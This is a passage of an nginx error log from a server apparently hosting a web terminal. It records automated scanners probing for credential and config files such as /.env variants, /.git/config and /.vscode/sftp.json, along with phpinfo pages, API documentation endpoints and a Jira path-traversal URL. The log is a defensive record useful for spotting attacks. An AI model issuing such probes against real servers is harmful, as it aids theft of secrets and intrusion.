could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:20 [error] 295#295: *15366 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:21 [error] 292#292: *15369 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /server HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:22 [error] 292#292: *15371 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /server-status HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:22 [error] 292#292: *15373 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:22 [error] 292#292: *15373 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:22 [error] 292#292: *15373 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:22 [error] 292#292: *15373 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:24 [error] 292#292: *15374 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /about HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:25 [error] 292#292: *15376 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /login.action HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:26 [error] 292#292: *15378 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /_all_dbs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:27 [error] 292#292: *15381 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /v2/_catalog HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:28 [error] 292#292: *15383 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /.DS_Store HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:29 [error] 292#292: *15385 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:31 [error] 292#292: *15387 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:34 [error] 292#292: *15389 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:35 [error] 292#292: *15391 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "POST /graphql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:36 [error] 292#292: *15394 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "POST /api HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:37 [error] 292#292: *15398 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "POST /api/graphql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:38 [error] 293#293: *15401 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "POST /graphql/api HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:39 [error] 293#293: *15403 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "POST /api/gql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:40 [error] 293#293: *15405 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:41 [error] 293#293: *15406 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /s/139313e2531323e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:42 [error] 293#293: *15409 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:44 [error] 293#293: *15411 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /telescope/requests HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:45 [error] 293#293: *15413 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:46 [error] 293#293: *15415 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /actuator/env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:49 [error] 293#293: *15418 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /swagger-ui.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:50 [error] 293#293: *15420 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /swagger/index.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:51 [error] 293#293: *15422 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /swagger/swagger-ui.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:52 [error] 293#293: *15424 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:53 [error] 293#293: *15426 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /swagger.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:54 [error] 293#293: *15428 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /swagger/v1/swagger.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:55 [error] 293#293: *15430 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /v2/api-docs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:56 [error] 293#293: *15432 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /v3/api-docs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:57 [error] 294#294: *15434 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /api-docs/swagger.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:58 [error] 294#294: *15436 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /api/swagger.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:59 [error] 294#294: *15438 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /@vite/env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:23:00 [error] 294#294: *15439 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /.vscode/sftp.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:23:01 [error] 294#294: *15440 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:23:02 [error] 294#294: *15441 web-terminal could not be resolved (2: Server failure), client: 68.183.180.73, server: terminal.profibot.hu, request: "GET /debug/default/view?panel=config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:23:37 [error] 294#294: *15443 web-terminal could not be resolved (2: Server failure), client: 162.43.226.16, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:23:37 [error] 294#294: *15445 web-terminal could not be resolved (2: Server failure), client: 104.232.199.4, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:23:37 [error] 294#294: *15443 web-terminal could not be resolved (2: Server failure), client: 162.43.226.16, server: terminal.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu/" +2026/01/27 23:23:37 [error] 294#294: *15446 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:23:37 [error] 294#294: *15446 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:23:37 [error] 294#294: *15445 web-terminal could not be resolved (2: Server failure), client: 104.232.199.4, server: terminal.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu/" +2026/01/27 23:23:37 [error] 294#294: *15446 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:23:37 [error] 294#294: *15446 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:24:14 [error] 294#294: *15447 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:24:14 [error] 294#294: *15447 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:24:14 [error] 294#294: *15447 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:24:14 [error] 294#294: *15447 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:24:15 [error] 294#294: *15448 web-terminal could not be resolved (2: Server failure), client: 194.163.149.48, server: terminal.profibot.hu, request: "GET /.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:24:56 [error] 294#294: *15454 web-terminal could not be resolved (2: Server failure), client: 37.76.47.171, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:24:56 [error] 294#294: *15454 web-terminal could not be resolved (2: Server failure), client: 37.76.47.171, server: terminal.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu/" +2026/01/27 23:24:58 [error] 295#295: *15456 web-terminal could not be resolved (2: Server failure), client: 66.249.81.193, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:24:58 [error] 295#295: *15457 web-terminal could not be resolved (2: Server failure), client: 66.102.9.135, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:24:58 [error] 292#292: *15458 web-terminal could not be resolved (2: Server failure), client: 66.102.9.129, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:25:09 [error] 295#295: *15460 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu" +2026/01/27 23:25:09 [error] 295#295: *15460 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu" +2026/01/27 23:25:10 [error] 295#295: *15460 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD /_next HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/_next" +2026/01/27 23:25:10 [error] 295#295: *15460 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD /__rsc HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/__rsc" +2026/01/27 23:25:10 [error] 295#295: *15460 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD /rsc HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/rsc" +2026/01/27 23:25:12 [error] 295#295: *15462 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu" +2026/01/27 23:25:12 [error] 295#295: *15462 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu" +2026/01/27 23:25:13 [error] 295#295: *15462 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD /_next HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/_next" +2026/01/27 23:25:13 [error] 295#295: *15462 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD /__rsc HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/__rsc" +2026/01/27 23:25:13 [error] 295#295: *15462 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD /rsc HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/rsc" +2026/01/27 23:25:20 [error] 295#295: *15463 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:25:20 [error] 295#295: *15463 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:25:20 [error] 295#295: *15463 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:25:20 [error] 295#295: *15463 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:26:16 [error] 295#295: *15467 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu" +2026/01/27 23:26:17 [error] 295#295: *15467 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu" +2026/01/27 23:26:17 [error] 295#295: *15467 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD /_next HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/_next" +2026/01/27 23:26:18 [error] 295#295: *15467 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD /__rsc HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/__rsc" +2026/01/27 23:26:18 [error] 295#295: *15467 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD /rsc HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/rsc" +2026/01/27 23:26:38 [error] 295#295: *15468 web-terminal could not be resolved (2: Server failure), client: 37.76.47.171, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:26:38 [error] 295#295: *15468 web-terminal could not be resolved (2: Server failure), client: 37.76.47.171, server: terminal.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu/" +2026/01/27 23:26:39 [error] 295#295: *15468 web-terminal could not be resolved (2: Server failure), client: 37.76.47.171, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:26:40 [error] 295#295: *15468 web-terminal could not be resolved (2: Server failure), client: 37.76.47.171, server: terminal.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu/" +2026/01/27 23:28:01 [error] 295#295: *15471 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu" +2026/01/27 23:28:01 [error] 295#295: *15471 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu" +2026/01/27 23:28:02 [error] 295#295: *15471 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD /_next HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/_next" +2026/01/27 23:28:03 [error] 295#295: *15471 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD /__rsc HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/__rsc" +2026/01/27 23:28:03 [error] 295#295: *15471 web-terminal could not be resolved (2: Server failure), client: 176.65.148.161, server: terminal.profibot.hu, request: "HEAD /rsc HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/rsc" +2026/01/27 23:30:01 [error] 295#295: *15472 web-terminal could not be resolved (2: Server failure), client: 37.76.47.171, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:30:01 [error] 295#295: *15472 web-terminal could not be resolved (2: Server failure), client: 37.76.47.171, server: terminal.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu/" +2026/01/27 23:30:03 [error] 295#295: *15472 web-terminal could not be resolved (2: Server failure), client: 37.76.47.171, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:30:03 [error] 295#295: *15472 web-terminal could not be resolved (2: Server failure), client: 37.76.47.171, server: terminal.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu/" +2026/01/27 23:35:53 [error] 292#292: *15504 web-terminal could not be resolved (2: Server failure), client: 192.175.111.253, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/" +2026/01/27 23:35:54 [error] 292#292: *15506 web-terminal could not be resolved (2: Server failure), client: 64.15.129.116, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/" +2026/01/27 23:35:55 [error] 292#292: *15508 web-terminal could not be resolved (2: Server failure), client: 192.175.111.249, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/" +2026/01/27 23:35:55 [error] 292#292: *15509 web-terminal could not be resolved (2: Server failure), client: 192.175.111.246, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:35:56 [error] 292#292: *15511 web-terminal could not be resolved (2: Server failure), client: 192.175.111.252, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu/" +2026/01/27 23:37:01 [error] 292#292: *15512 web-terminal could not be resolved (2: Server failure), client: 37.76.47.171, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:37:01 [error] 292#292: *15512 web-terminal could not be resolved (2: Server failure), client: 37.76.47.171, server: terminal.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu/" +2026/01/27 23:40:16 [error] 294#294: *15538 web-terminal could not be resolved (2: Server failure), client: 154.28.229.18, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:40:20 [error] 294#294: *15539 web-terminal could not be resolved (2: Server failure), client: 104.164.173.203, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:40:26 [error] 294#294: *15540 web-terminal could not be resolved (2: Server failure), client: 103.4.250.163, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 00:05:22 [error] 295#295: *15555 web-terminal could not be resolved (2: Server failure), client: 91.196.152.87, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 00:28:38 [error] 295#295: *15562 web-terminal could not be resolved (2: Server failure), client: 107.172.195.214, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 00:28:38 [error] 295#295: *15563 web-terminal could not be resolved (2: Server failure), client: 104.164.173.64, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 00:29:01 [error] 295#295: *15564 web-terminal could not be resolved (2: Server failure), client: 104.164.126.230, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 00:36:24 [error] 295#295: *15569 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 00:36:24 [error] 295#295: *15569 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 00:36:24 [error] 295#295: *15569 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 00:36:24 [error] 295#295: *15569 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:09:38 [error] 295#295: *17072 web-terminal could not be resolved (2: Server failure), client: 34.219.155.110, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu" +2026/01/28 01:09:38 [error] 295#295: *17073 web-terminal could not be resolved (2: Server failure), client: 34.219.155.110, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu" +2026/01/28 01:10:34 [error] 295#295: *17074 web-terminal could not be resolved (2: Server failure), client: 216.73.216.113, server: terminal.profibot.hu, request: "GET /robots.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:14:33 [error] 292#292: *17075 web-terminal could not be resolved (2: Server failure), client: 100.23.93.124, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:14:33 [error] 292#292: *17075 web-terminal could not be resolved (2: Server failure), client: 100.23.93.124, server: terminal.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu/" +2026/01/28 01:14:35 [error] 292#292: *17077 web-terminal could not be resolved (2: Server failure), client: 100.23.93.124, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:14:36 [error] 292#292: *17077 web-terminal could not be resolved (2: Server failure), client: 100.23.93.124, server: terminal.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu/" +2026/01/28 01:18:27 [error] 292#292: *17082 web-terminal could not be resolved (2: Server failure), client: 84.254.106.197, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:18:27 [error] 292#292: *17082 web-terminal could not be resolved (2: Server failure), client: 84.254.106.197, server: terminal.profibot.hu, request: "GET /js/twint_ch.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:18:27 [error] 292#292: *17082 web-terminal could not be resolved (2: Server failure), client: 84.254.106.197, server: terminal.profibot.hu, request: "GET /js/lkk_ch.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:18:27 [error] 292#292: *17082 web-terminal could not be resolved (2: Server failure), client: 84.254.106.197, server: terminal.profibot.hu, request: "GET /css/support_parent.css HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:21:03 [error] 292#292: *17083 web-terminal could not be resolved (2: Server failure), client: 98.84.1.175, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:21:48 [error] 292#292: *17085 web-terminal could not be resolved (2: Server failure), client: 74.7.244.51, server: terminal.profibot.hu, request: "GET /robots.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /info.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /php-info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /newinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /siteinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /info.php.1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /pageinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /info.php.back HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpbb/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /release_info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.php3 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.php.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /info.php.save.1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:04 [error] 